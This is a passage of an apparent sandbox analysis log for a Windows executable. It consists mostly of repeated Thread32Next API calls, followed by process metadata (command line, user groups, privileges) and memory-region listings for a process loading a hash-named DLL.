lpte=0x14fe78) returned 1 [0293.445] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.659] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.661] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.661] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.663] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.664] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.665] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.666] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.667] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.668] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.669] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.669] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.670] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.671] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.672] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.673] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.674] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.675] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.677] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.678] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.679] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.680] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.681] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.682] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.683] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.685] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.686] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.687] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.688] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.689] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.690] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.691] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.692] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.693] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.694] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.695] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.871] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.872] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.872] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.873] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.874] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.875] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.876] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.876] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.877] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.878] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.879] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.880] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.881] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.882] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.883] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.884] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.885] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.886] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.887] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.888] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.889] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.890] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.891] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.892] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.895] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.896] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.898] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.899] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.900] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.901] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.902] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.903] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.904] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.905] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.907] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.077] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.078] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.079] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.079] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.080] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.081] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.082] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.083] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.084] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.085] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.086] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.086] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.087] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.088] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.089] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.090] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.091] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.093] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.093] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.094] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.095] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.096] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.097] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.098] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.100] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.102] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.103] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.104] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.105] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.106] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.107] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.107] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.108] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.109] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.110] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.111] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.111] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.312] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.313] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.314] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.315] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.316] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.317] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.318] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.319] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.320] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.321] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.322] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.323] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.324] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.325] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.337] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.338] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.340] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.341] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.342] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.343] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.344] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.345] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.346] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.347] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.348] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.348] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.350] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.350] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.351] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.352] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.353] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.354] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.355] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.356] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.357] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.551] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.553] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.554] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.555] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.556] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.557] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.558] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.559] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.560] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.562] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.563] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.564] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.565] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.566] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.567] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.568] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.569] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.570] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.574] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.575] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.576] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.578] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.579] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.580] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.581] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.582] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.583] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.585] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.586] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.587] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.588] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.792] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.792] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.793] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.794] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.795] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.796] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.796] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.797] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.798] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.799] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.800] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.800] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.801] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.802] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.803] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.804] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.804] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.805] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.806] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.807] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.807] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.808] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.809] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.810] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.811] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.811] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.812] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.813] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.814] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.816] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.817] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.818] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.819] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.820] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.821] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.822] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.826] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.827] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.828] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.829] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.829] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.994] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.995] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.995] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.997] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.998] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.999] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0294.999] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.000] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.000] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.001] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.002] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.002] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.003] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.004] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.005] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.006] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.007] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.007] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.008] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.008] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.009] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.010] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.011] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.011] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.012] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.013] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.013] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.014] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.015] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.015] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.016] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.017] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.018] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.019] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.020] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.021] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.021] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.022] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.024] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.025] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.025] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.027] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.027] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.028] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.029] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.029] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.629] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.643] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.644] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.645] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.647] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.648] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.649] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.649] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.650] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.651] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.652] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.653] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.653] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.654] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.655] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.656] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.657] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.657] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.658] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.659] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.660] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.661] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.662] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.662] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.663] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.664] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.837] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.837] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.838] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.839] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.839] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.840] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.840] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.841] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.842] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.842] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.843] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.844] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.844] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.845] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.845] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.846] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.847] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.847] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.848] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.848] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.849] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.850] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.850] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.851] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.851] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.852] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.853] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.854] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.854] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.855] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.855] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.856] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.857] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.858] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.859] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.860] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0295.860] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) Thread: id = 229 os_tid = 0x118c Process: id = "34" image_name = "giumlol.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe" page_root = "0x2305e000" os_pid = "0x13d0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xcc8" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_image_create" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 15638 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 15639 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 15640 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 15641 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 15642 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 15643 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 15644 start_va = 0x7ff626f50000 end_va = 0x7ff626f77fff monitored = 1 entry_point = 0x7ff626f51e8c region_type = mapped_file name = "giumlol.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe") Region: id = 15645 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 15646 start_va = 0x150000 end_va = 0x153fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 15647 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 15648 start_va = 0x170000 end_va = 0x171fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 15649 start_va = 0x5d0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = 